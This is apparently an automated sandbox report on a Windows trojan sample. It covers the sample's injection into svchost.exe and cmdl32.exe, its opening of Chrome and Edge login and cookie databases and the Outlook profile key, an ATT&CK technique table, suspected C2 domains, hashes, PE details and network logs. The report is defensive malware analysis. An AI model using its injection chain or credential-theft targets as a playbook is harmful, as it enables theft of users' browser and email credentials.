            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtProtectVirtualMemory: Direct from: 0x77377B2E
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmdl32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: NULL target: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe protection: read write
            Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: NULL target: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmdl32.exe Thread register set: target process: 5940
            Source: C:\Windows\SysWOW64\cmdl32.exe Thread APC queued: target process: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F4A008
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\P030092024LANDWAY.exe"
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe Process created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"
            Source: C:\Windows\SysWOW64\cmdl32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: BpYpWzndkWcpUJ.exe, 00000006.00000002.4605196059.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000000.2409582553.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558031469.0000000001281000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
            Source: BpYpWzndkWcpUJ.exe, 00000006.00000002.4605196059.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000000.2409582553.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558031469.0000000001281000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: BpYpWzndkWcpUJ.exe, 00000006.00000002.4605196059.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000000.2409582553.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558031469.0000000001281000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: BpYpWzndkWcpUJ.exe, 00000006.00000002.4605196059.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000000.2409582553.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558031469.0000000001281000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\cmdl32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            412
            Process Injection
            2
            Virtualization/Sandbox Evasion
            1
            OS Credential Dumping
            121
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism
            412
            Process Injection
            LSASS Memory2
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
            Obfuscated Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Software Packing
            Cached Domain Credentials12
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            [Behavior graph: ID 1522543; Sample: P030092024LANDWAY.exe; Startdate: 30/09/2024; Architecture: WINDOWS; Score: 100. Process chain shown: P030092024LANDWAY.exe (started) -> svchost.exe (started) -> BpYpWzndkWcpUJ.exe (injected) -> cmdl32.exe (started) -> BpYpWzndkWcpUJ.exe (injected) and firefox.exe (started).]

            Source | Detection | Scanner | Label
            P030092024LANDWAY.exe | 29% | Virustotal |
            P030092024LANDWAY.exe | 29% | ReversingLabs | Win32.Trojan.Swotter
            P030092024LANDWAY.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            natroredirect.natrocdn.com | 0% | Virustotal |
            030002837.xyz | 0% | Virustotal |
            accupower.tech | 1% | Virustotal |
            mondayigboleague.info | 0% | Virustotal |
            www.mondayigboleague.info | 0% | Virustotal |
            www.accupower.tech | 1% | Virustotal |
            www.8zu934.vip | 0% | Virustotal |
            Source | Detection | Scanner | Label
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            http://www.mondayigboleague.info | 0% | Virustotal |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            Name | Malicious | Antivirus Detection | Reputation
            Name | Source | Malicious | Antivirus Detection | Reputation
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
            Joe Sandbox version: 41.0.0 Charoite
            Analysis ID: 1522543
            Start date and time: 2024-09-30 10:40:10 +02:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 10m 2s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed: 10
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 2
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: P030092024LANDWAY.exe
            Detection: MAL
            Classification: mal100.troj.spyw.evad.winEXE@7/2@14/11
            EGA Information:
            • Successful, ratio: 75%
            HCA Information:
            • Successful, ratio: 87%
            • Number of executed functions: 50
            • Number of non-executed functions: 316
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time: 04:42:15
Type: API Interceptor
Description: 8403237x Sleep call for process: cmdl32.exe modified
Process: C:\Windows\SysWOW64\cmdl32.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\P030092024LANDWAY.exe
File Type: data
Category: dropped
Size (bytes): 287744
Entropy (8bit): 7.995193704126155
Encrypted: true
SSDEEP: 6144:d3m9leIdqlG11PBY1kqunQ1NQI6iM07kMYF5QIQR:5mC/lGCiq+Q1NQIBfVs9QR
MD5: D5AE76C885DCB9BF01F253E3E556E58F
SHA1: E3A052B78859390DDA5BCEEE044BE36551B9F4F6
SHA-256: 1D24C71A3D3A46C6C025BCF1199C91FF796303114844A5566EFFD59E42B4AD59
SHA-512: 500714D4049D378625717EBEC8C38A7FA1D858BB679AF2E62A024F1E34B6A16422936BE3D3E3BE1E037833FA36C17B8608D06E68710D214040F5262544ABE4B2
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit): 7.9807729692267815
TrID:
• Win32 Executable (generic) a (10002005/4) 94.59%
• AutoIt3 compiled script executable (510682/80) 4.83%
• UPX compressed Win32 Executable (30571/9) 0.29%
• Win32 EXE Yoda's Crypter (26571/9) 0.25%
• Generic Win/DOS Executable (2004/3) 0.02%
File name: P030092024LANDWAY.exe
File size: 1'054'545 bytes
MD5: 3ffb03ef28aff93d8cd6b83911d700ee
SHA1: 4322b8a74fed0809dca565feff13bae1c60196d4
SHA256: 0efac5788be9dbd7b74affa2c8f6c14a2b6cce84d981d0b088566e50eefc72e4
SHA512: 03d81a9304653be5901e5548b723beabd8a673eabb8b3b3e319806c2f7b0812e8d419dfdf9ec33e31d798abb1a13665d9b05c3a2717d1176279fad740fc6379f
SSDEEP: 24576:VD0tM85tbNJjldeYiYVq2AwvdNCf8WsN0Pg4FMOrGDks3+oRqXY:VD0tM85DJjl/iY0wvdNm8WsqDFMOFoRV
TLSH: 8825230B915482F9D95B2B39AED73AC61679FC62303212534F6779AF1D29F3840123FA
Icon Hash: 1733312925935517
Entrypoint: 0x4b8b90
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 77b2e5e9b52fbef7638f64ab65f0c58c
                                                                                      Instruction
                                                                                      pushad
                                                                                      mov esi, 00477000h
                                                                                      lea edi, dword ptr [esi-00076000h]
                                                                                      push edi
                                                                                      jmp 00007F8CBC6F94ADh
                                                                                      nop
                                                                                      mov al, byte ptr [esi]
                                                                                      inc esi
                                                                                      mov byte ptr [edi], al
                                                                                      inc edi
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      jc 00007F8CBC6F948Fh
                                                                                      mov eax, 00000001h
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      adc eax, eax
                                                                                      add ebx, ebx
                                                                                      jnc 00007F8CBC6F94ADh
                                                                                      jne 00007F8CBC6F94CAh
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      jc 00007F8CBC6F94C1h
                                                                                      dec eax
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      adc eax, eax
                                                                                      jmp 00007F8CBC6F9476h
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      adc ecx, ecx
                                                                                      jmp 00007F8CBC6F94F4h
                                                                                      xor ecx, ecx
                                                                                      sub eax, 03h
                                                                                      jc 00007F8CBC6F94B3h
                                                                                      shl eax, 08h
                                                                                      mov al, byte ptr [esi]
                                                                                      inc esi
                                                                                      xor eax, FFFFFFFFh
                                                                                      je 00007F8CBC6F9517h
                                                                                      sar eax, 1
                                                                                      mov ebp, eax
                                                                                      jmp 00007F8CBC6F94ADh
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      jc 00007F8CBC6F946Eh
                                                                                      inc ecx
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      jc 00007F8CBC6F9460h
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      adc ecx, ecx
                                                                                      add ebx, ebx
                                                                                      jnc 00007F8CBC6F9491h
                                                                                      jne 00007F8CBC6F94ABh
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      jnc 00007F8CBC6F9486h
                                                                                      add ecx, 02h
                                                                                      cmp ebp, FFFFFB00h
                                                                                      adc ecx, 02h
                                                                                      lea edx, dword ptr [edi+ebp]
                                                                                      cmp ebp, FFFFFFFCh
                                                                                      jbe 00007F8CBC6F94B0h
                                                                                      mov al, byte ptr [edx]
                                                                                      Programming Language:
                                                                                      • [ASM] VS2008 SP1 build 30729
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [C++] VS2008 SP1 build 30729
                                                                                      • [ C ] VS2005 build 50727
                                                                                      • [IMP] VS2005 build 50727
                                                                                      • [ASM] VS2008 build 21022
                                                                                      • [RES] VS2008 build 21022
                                                                                      • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc0038 | 0x3b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb9000 | 0x7038 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x76000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x77000 | 0x42000 | 0x41e00 | f914a8d655ae07ad6878d428980d492e | False | 0.9933401031783681 | data | 7.929619295565276 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xb9000 | 0x8000 | 0x7400 | 375506aad8714493f389985f5be0ee28 | False | 0.5646214978448276 | data | 5.905766661808417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb95cc | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xb96f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xb9824 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xb9950 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xb9fbc | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xba2a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xba3d4 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xbb280 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xbbb2c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xbc098 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xbe644 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xbf6f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 1.1375
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 1.0436507936507937
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 1.0082831325301205
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 1.006547619047619
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 1.010166358595194
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 1.0071801566579635
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 1.0067567567567568
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 1.0121681415929205
RT_STRING | 0xb3c60 | 0x158 | data | English | United States | 1.0319767441860466
RT_GROUP_ICON | 0xbfb5c | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xbfbe4 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xbfbfc | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xbfc14 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xbfc2c | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xbfdcc | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | GetAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetSaveFileNameW
GDI32.dll | LineTo
MPR.dll | WNetGetConnectionW
ole32.dll | CoInitialize
OLEAUT32.dll | SafeArrayUnaccessData
PSAPI.DLL | EnumProcesses
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | recv
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
                                                                                      Sep 30, 2024 10:41:53.224987984 CEST5877280192.168.2.6172.191.244.62
                                                                                      Sep 30, 2024 10:41:53.229790926 CEST8058772172.191.244.62192.168.2.6
                                                                                      Sep 30, 2024 10:41:53.699368000 CEST8058772172.191.244.62192.168.2.6
                                                                                      Sep 30, 2024 10:41:53.699456930 CEST8058772172.191.244.62192.168.2.6
                                                                                      Sep 30, 2024 10:41:53.699517012 CEST5877280192.168.2.6172.191.244.62
                                                                                      Sep 30, 2024 10:41:53.703113079 CEST5877280192.168.2.6172.191.244.62
                                                                                      Sep 30, 2024 10:41:53.708230019 CEST8058772172.191.244.62192.168.2.6
                                                                                      Sep 30, 2024 10:42:08.783862114 CEST5877480192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:08.788719893 CEST80587743.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:08.788826942 CEST5877480192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:08.799442053 CEST5877480192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:08.804327965 CEST80587743.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:09.262880087 CEST80587743.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:09.262936115 CEST5877480192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:10.311932087 CEST5877480192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:10.316772938 CEST80587743.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:11.330576897 CEST5877580192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:11.335406065 CEST80587753.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:11.335496902 CEST5877580192.168.2.63.33.130.190
